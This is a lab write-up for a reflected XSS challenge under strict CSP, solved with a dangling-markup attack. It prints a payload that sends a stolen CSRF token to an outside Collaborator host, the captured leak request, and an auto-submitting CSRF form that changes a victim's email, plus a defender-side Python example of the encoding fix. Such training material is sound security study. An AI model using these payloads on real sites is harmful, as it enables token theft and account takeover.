Reflected XSS protected by very strict CSP, with dangling markup attack
Once again, the solution provided is very good. If you can't find the CSRF token in Collaborator, just do a Ctrl-F in the request:
GET /?%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20required%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%220d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbutton%20class%3D HTTP/1.1
Host: pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit
Accept-Encoding: gzip, deflate, br
First payload to get the CSRF token:
<script>
if(window.name) {
new Image().src='//pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
location = 'https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email?email=%22%3E%3Ca%20href=%22https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
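As an added defender-side example (not part of this writeup or the lab), the Python below shows why the first payload works: the `email` value is reflected into an attribute unencoded, so the trailing `<base target='` leaves the document inside a tag whose quoted attribute never closes, and attribute-context encoding removes that possibility. The URL `https://attacker.example/exploit` is a placeholder standing in for the exploit-server link.

```python
import html

# Constructed sample: the URL-decoded `email` value sent by the first payload.
# It closes the real attribute, injects a link, then opens a tag it never closes.
INJECTED_EMAIL = (
    '"><a href="https://attacker.example/exploit">Click me</a><base target=\''
)


def render_vulnerable(email: str) -> str:
    """Reflect the value into an attribute with no encoding (the lab's bug)."""
    return f'<input required type="hidden" name="email" value="{email}">'


def render_hardened(email: str) -> str:
    """Attribute-context encoding; quote=True also encodes both quote characters."""
    safe = html.escape(email, quote=True)
    return f'<input required type="hidden" name="email" value="{safe}">'


def ends_inside_tag(markup: str) -> bool:
    """Minimal tokenizer: True if the markup ends while still inside a tag.

    A `>` inside a quoted attribute value does not close the tag, which is
    exactly what lets `<base target='` swallow the rest of the page up to the
    next single quote.
    """
    in_tag = False
    quote = None
    for ch in markup:
        if not in_tag:
            in_tag = ch == "<"
        elif quote:
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch == ">":
            in_tag = False
    return in_tag


if __name__ == "__main__":
    print("vulnerable dangling:", ends_inside_tag(render_vulnerable(INJECTED_EMAIL)))
    print("hardened dangling:  ", ends_inside_tag(render_hardened(INJECTED_EMAIL)))
```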
Second payload to solve the lab:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email/change-email" method="POST">
<input type="hidden" name="email" value="hacker@evil-user.net" />
<input type="hidden" name="csrf" value="0d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>